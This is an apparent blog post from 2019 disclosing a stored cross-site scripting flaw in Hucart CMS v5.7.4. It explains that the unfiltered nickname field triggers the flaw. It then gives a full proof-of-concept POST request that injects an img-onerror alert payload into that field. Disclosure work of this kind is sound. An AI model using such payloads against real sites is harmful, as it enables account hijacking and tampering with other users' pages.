Hucart cms v5.7.4 XSS Vulnerability analysis

 

 

code analysis

 

 

 

Updating user information, data submitted by users and not filtering dangerous characters result in XSS storage vulnerabilities

After sending EXP, browsing user information triggers XSS vulnerability 

 

 

 

POC

First register an account

http://127.0.0.1/hucart/user/index.php?load=login&act=reg

Then log in.

Exp Packets are provided here

Insert XSS payload at nickname

Triggered while browsing user's basic information 

http://127.0.0.1/hucart/user/index.php?load=login&act=reg

POST /hucart/user/index.php?load=user_info&act=update_user HTTP/1.1

Host: 192.168.0.110

Content-Length: 1541

Cache-Control: max-age=0

Origin: http://192.168.0.110

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygIVXHhUwlupAJTnM

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://192.168.0.110/hucart/user/?load=user_info&act=info_list

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=k2mlv9rtdavtioa98nqajithm5; bdshare_firstime=1550149965528; ck_num=79385312dbee4c9e7270b26e4b3e1459

Connection: close

 

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="usd_nick"

 

"><img src=# onerror=alert(1)>

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="usd_image"

 

 

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="usd_truename"

 

 

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="usd_birthday"

 

 

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="usd_salt"

 

0

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="usd_msn"

 

admin

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="usd_qq"

 

123123

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="usd_officephone"

 

 

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="usd_homephone"

 

 

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="usd_tel"

 

123123

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="province"

 

 

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="city"

 

 

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="district"

 

 

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="pcd_all"

 

 

------WebKitFormBoundarygIVXHhUwlupAJTnM

Content-Disposition: form-data; name="usd_address"

 

 

------WebKitFormBoundarygIVXHhUwlupAJTnM--

posted @ 2019-02-14 21:41  echo_d  阅读(184)  评论(0编辑  收藏  举报